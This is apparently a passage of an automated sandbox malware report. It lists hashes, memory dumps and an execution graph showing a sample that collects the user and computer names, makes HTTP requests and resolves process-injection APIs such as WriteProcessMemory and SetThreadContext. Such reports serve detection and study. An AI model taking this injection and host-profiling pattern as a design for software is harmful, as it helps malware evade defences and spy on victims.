• Instruction ID: 04f982904d0010a16488625bb8a2fc32c13cfa3dee55addbb1e4df3ca8c7a0ac
• Opcode Fuzzy Hash: 55ecc68b351dc28539488a4037538ae55ed7db6a4930e599dee6cca27e613249
• Instruction Fuzzy Hash: 51E0ED353002108F86119B1ED458C26BBFAEFCEA5571500A9E585DB321DB61DC01DB90
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec22e6619e2ed4551c0dfbb2b55db14bec9d88faa25bf973caacf5ba11930df
• Instruction ID: fd8ab4700b05fd606e67530d967535d5e4e765a8ac7cee4a6164075579d1a7bd
• Opcode Fuzzy Hash: cec22e6619e2ed4551c0dfbb2b55db14bec9d88faa25bf973caacf5ba11930df
• Instruction Fuzzy Hash: E1E09A323493D15B8B1B9229A8110A6BF6B8AC322030A80FAE084CF3A2DD558D0687B1
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0912c9bb0a0f857880058f62338708e4b55f67334aabbb3e4b7406e1be136494
• Instruction ID: efaded1ffe56080fa3c796e545080b94f5dfa524de03bd753efc95995716f77f
• Opcode Fuzzy Hash: 0912c9bb0a0f857880058f62338708e4b55f67334aabbb3e4b7406e1be136494
• Instruction Fuzzy Hash: FAE092357092509FCF0A2774A41C2AE7AA2EBD4725F04016ED50A87342CF790846CB95
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0b51b039705b82e018cc9f1215f91178276f3f7b09673eed77963864cf80a46
• Instruction ID: 57c8f6d0a14c110e6942f4b381e0e0f0552dfc0fa119eba733ea7e4a0299d20e
• Opcode Fuzzy Hash: d0b51b039705b82e018cc9f1215f91178276f3f7b09673eed77963864cf80a46
• Instruction Fuzzy Hash: DEF06D709003048FD7609FB8D89C39ABBE6EB44310F00446DD15ED3340DB796881CB90
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1733037cb7ddf0027d99ffde1142f529864edfba2e4983d572f6c133dfbea55c
• Instruction ID: d958897fa0396d8ec2ae57b2f6bcb1c59e601a357a05cd3860e7e79eb10a0f2d
• Opcode Fuzzy Hash: 1733037cb7ddf0027d99ffde1142f529864edfba2e4983d572f6c133dfbea55c
• Instruction Fuzzy Hash: 72E0C723B072211B021621FADC102FBA9CFCAC20A1F0A0136FA4AC7341ED90CC0193F2
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bd88e2277045195d79185f006d3c58aa6a70ebe6cbb490bb36aba490ac9a302
• Instruction ID: 67e8b9a3f02e7abdd89c8359f411e68a56763ac31fad388653388582b57d9197
• Opcode Fuzzy Hash: 9bd88e2277045195d79185f006d3c58aa6a70ebe6cbb490bb36aba490ac9a302
• Instruction Fuzzy Hash: BDE086357086149BCF093775A81C2AE7A97EBD4725F04006ED61E83341CF7D5D4687E9
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d11aaf5c01e62b40b8901806b9518b865cee848dc141ac837e5f544507b85e9
• Instruction ID: cce31a282e735fd929ef4ecefeafd982cef1b41ef8b9de50e0cfd2b98875baf4
• Opcode Fuzzy Hash: 2d11aaf5c01e62b40b8901806b9518b865cee848dc141ac837e5f544507b85e9
• Instruction Fuzzy Hash: CFD05E23B072211B065620FADC106FBA1CFCAC55A1F050136FA0AD3341ED90CC0193F1
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
• Instruction ID: b554e5dba722fd039a62c8365419392b809f838aad71bff1796aea1e9aac8505
• Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
• Instruction Fuzzy Hash: 47E08631B10114978B089959D4104EDFBAADBCD221F04807AD94AA7340DA329D15CAE1
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2465dd05bb5bccadb57e3b60c22dac57ad39a26c0ee57ced7a36f0219fd1c956
• Instruction ID: af094b2db68b498719d2114c4a0ab6337e93272e32b53e8eb62a4b57830ea0d7
• Opcode Fuzzy Hash: 2465dd05bb5bccadb57e3b60c22dac57ad39a26c0ee57ced7a36f0219fd1c956
• Instruction Fuzzy Hash: E5E0C271740724578612A62EE81095F77DBDFC8672314486EE15EC7300DFA4DC068BE5
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e04a825644d451dff4b38d208bdb389353fe4bce451e73577ca7d2e4392c2e02
• Instruction ID: 3f3a8933a1529626bffe35e26d03bc4c1f2c255b876b6e8e0d6ccd52ef95161b
• Opcode Fuzzy Hash: e04a825644d451dff4b38d208bdb389353fe4bce451e73577ca7d2e4392c2e02
• Instruction Fuzzy Hash: FBE01230805249DFC70EEF64D80A4A97F74EB11311F0001ADD59787261DA305A8ACF95
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1340d4deec6bf23ba169bdd980fb6f4faaa4097afdc09c2f508db189f81f967b
• Instruction ID: 8d7a799db0046ada18092e95b7eea0bd2c590a1b1df357e49889d448fb2371b7
• Opcode Fuzzy Hash: 1340d4deec6bf23ba169bdd980fb6f4faaa4097afdc09c2f508db189f81f967b
• Instruction Fuzzy Hash: 23E01A3590924ADFCB19DB68D4969ADBFB0EF1A314B1042ACE98AD7762D7304951CF80
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 34d3309c7114851d271893f629124bc281e9410fc4daeb9e8df8f90c175a9b18
                                                                                                                                                                                                                      • Instruction ID: d4d4a55a615544579e73e1f31a58b2c778aef1b63eae13405f51ed864308f488
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34d3309c7114851d271893f629124bc281e9410fc4daeb9e8df8f90c175a9b18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE01270D451495E8B91DF78C5805AAFFF0AB59214B1485AED549D6311D2328912CB81
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction ID: a803b04aa7748a6d59603ed72847518b338e0d87ea21cbfc2ff6208dafb80571
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D067B0D0420D9F8780EFADC94156EFBF4EB58210F6485AA8919E7301E7329A12CBD1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3fb966fefecc06b814b1cc5a80c9b59fc19af2b506de8ef62b69d090c8b0467b
                                                                                                                                                                                                                      • Instruction ID: 2c2ee0d3936f9a0a2564a143432f28249e6039ac18edb0a08c83d816ded97d3e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fb966fefecc06b814b1cc5a80c9b59fc19af2b506de8ef62b69d090c8b0467b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9D06731C04109DBCB09ABA4EC5A4BDBB74FB14311F40416DE95B92291EA355A9ACAC5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ec20f60486f7598b49b5c65d982fcddbe73272b589d310b2e8c53d57c362496f
                                                                                                                                                                                                                      • Instruction ID: 9d13ece1940a5e916b112e51459078ca3de9a8c62d1321f98818cfa92922ebc4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec20f60486f7598b49b5c65d982fcddbe73272b589d310b2e8c53d57c362496f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AFD01734A0820ADF8B08EFA4E84A86EBBB4EB48301F004169EE8993350EA305C41CBC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a460c2bf6f6562e977c9a505ef63c6c0564f12c61b20706a9d52e5f93f3c07b6
                                                                                                                                                                                                                      • Instruction ID: 683d59fa6f8a405505e2ad9f514d863695c21ad1c6152612e336f3fc5238a970
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a460c2bf6f6562e977c9a505ef63c6c0564f12c61b20706a9d52e5f93f3c07b6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97D0A73000D3C5AFCB031B7584344A63F71DE0320432505CED4868F1B3C521444ADF31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9c6a24461d1dcc3ad083521df787b55a7c44e1cc5545329403349cb4a2589956
                                                                                                                                                                                                                      • Instruction ID: 64668758c75bda042ad149b05810fe4ae5ff2bea586306a10f6e2d87d6d791ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c6a24461d1dcc3ad083521df787b55a7c44e1cc5545329403349cb4a2589956
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10C012104082D01FEF82433208360223FB0484720030A26C2C8818B072C8188C02DA42
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6ad829b915da50b20b130af68123007d30e1e8fc2592a9a47c77c00a40c02c87
                                                                                                                                                                                                                      • Instruction ID: f4efd83d297a74ec0f1674b0794973fd48a3aa6d7e1461a295ad2c6d5e06d24a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ad829b915da50b20b130af68123007d30e1e8fc2592a9a47c77c00a40c02c87
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48B09231044709CFC2496F75E4189157329BB4021A39008A8E90E0A2928E36E889CE45
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$piTk$tP^q$tP^q
                                                                                                                                                                                                                      • API String ID: 0-3346979675
                                                                                                                                                                                                                      • Opcode ID: 2e8153ec9eb55f492025c096f4907677b566a3c425c5ac452e86641c5d96fcf9
                                                                                                                                                                                                                      • Instruction ID: bbf16882db1fd7b96eb528ea2338063e9662f3a2e54b66108a881f2d94d7bac1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e8153ec9eb55f492025c096f4907677b566a3c425c5ac452e86641c5d96fcf9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCD14CB2B0431ACFDB258B68A40466BBBF6AFC5351F1484BBD64D8F251CB31C885C792
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: fcq$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-2717029046
                                                                                                                                                                                                                      • Opcode ID: 978dc7ada72ff6891a40108125a4752c5bd6f23cf8174bad5ae5ed0406ff48ae
                                                                                                                                                                                                                      • Instruction ID: 6d492a7e1b70b691467b4360d7621bf06fccd6a6b3b4ec31be524089c60c6e98
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 978dc7ada72ff6891a40108125a4752c5bd6f23cf8174bad5ae5ed0406ff48ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF135B17042158FEB299B6C941076BBBE2AFC1352F14C4BBD64DCB252DA31D885C7A2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529

Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.6%
Total number of Nodes: 54
Total number of Limit Nodes: 0
execution_graph 10681 43e893 10682 43e895 10681->10682 10691 40130b memset memset 10682->10691 10684 43e8b0 10685 4010c6 VirtualAllocExNuma 10684->10685 10686 43e8ba 10685->10686 10687 40168c GetPEB 10686->10687 10688 43e8c4 10687->10688 10689 43d191 OpenEventA 10688->10689 10690 43e8e2 10689->10690 10692 40135d 10691->10692 10693 431442 10694 431454 GetUserNameA 10693->10694 10696 431480 10697 431492 GetComputerNameA 10696->10697 10699 440f40 10700 440f57 LoadLibraryA 10699->10700 10702 441399 10700->10702 10703 401046 VirtualAlloc 10704 401070 10703->10704 10705 43d4eb 10706 43d508 CreateDirectoryA 10705->10706 10708 43d5e4 10706->10708 10715 43c684 10708->10715 10719 43c8ce Sleep 10708->10719 10711 43d686 InternetOpenA 10712 43d6bb 10711->10712 10716 43c6a4 10715->10716 10721 43c1c2 10716->10721 10720 43c8fa InternetOpenA 10719->10720 10720->10711 10722 43c1f0 10721->10722 10731 418160 InternetCloseHandle 10722->10731 10733 417e7d 10722->10733 10736 417f58 10722->10736 10739 417ec8 10722->10739 10742 417d09 10722->10742 10746 417e16 InternetConnectA 10722->10746 10747 418024 InternetReadFile 10722->10747 10732 418116 10731->10732 10734 417ecf HttpOpenRequestA 10733->10734 10737 417f73 HttpSendRequestA 10736->10737 10738 417fa9 10737->10738 10740 417ecf HttpOpenRequestA 10739->10740 10743 417d40 InternetOpenA 10742->10743 10745 417dc4 10743->10745 10748 414de8 10749 414e0f InternetCrackUrlA 10748->10749 10751 414ec1 10749->10751 10752 44163a 10753 44165c LoadLibraryA 10752->10753 10755 442112 LoadLibraryA LoadLibraryA 10753->10755 10756 44217b LoadLibraryA LoadLibraryA 10755->10756 10758 442220 LoadLibraryA 10756->10758 10759 4016ef lstrcmpiW

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 152 431442-43147f GetUserNameA
APIs
• GetUserNameA.ADVAPI32(00000000), ref: 00431475
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 158 418024-41805c InternetReadFile
APIs
• InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
                                                                                                                                                                                                                      • Opcode ID: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                      • Instruction ID: b6fb03e5c75202f5bdf7690399e95dcf118b51c36a476518bdd44740d121225c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDE04F31B1012B9FEB14DB60DC84E5233BABBC8704B108468D105A7115E6B1A907CF91

Control-flow Graph (legend: Executed / Not Executed)
Node 0: 44163a-44224d, LoadLibraryA * 6
APIs
• LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
• LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
• LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
• LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
• LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: LibraryLoad
• String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 1029625771-2674769033
• Opcode ID: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
• Instruction ID: fb63d92a9f115e913b2f9b718a076d9a6120d16dab0c00aa961a01dad6639e5b
• Opcode Fuzzy Hash: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
• Instruction Fuzzy Hash: 3C729EB4291240EFCB86EF19ED99811B7AAFB8D306316816DD87587374F7B1AC10DB09

Control-flow Graph (legend: Executed / Not Executed)
Nodes: 62 = 43d4eb-43d5f1 CreateDirectoryA; 90 = 43d5f3 call 43c684; 91 = 43d5f3 call 43c8ce; 76 = 43d5f5-43d744 InternetOpenA * 2. Edges: 62->90, 62->91, 90->76, 91->76.
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
• InternetOpenA.WININET ref: 0043D66B
• InternetOpenA.WININET ref: 0043D698
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711432956.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711520151.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000F.00000002.3711892275.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: InternetOpen$CreateDirectory
• String ID:
• API String ID: 1348255353-0
• Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
• Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
• Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
• Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A

Control-flow Graph (legend: Executed / Not Executed)
Node 92: 417e7d-417f47, HttpOpenRequestA
APIs
• HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3711313910.0000000000400000.00000002.00000001.01000000.00000008.sdmp
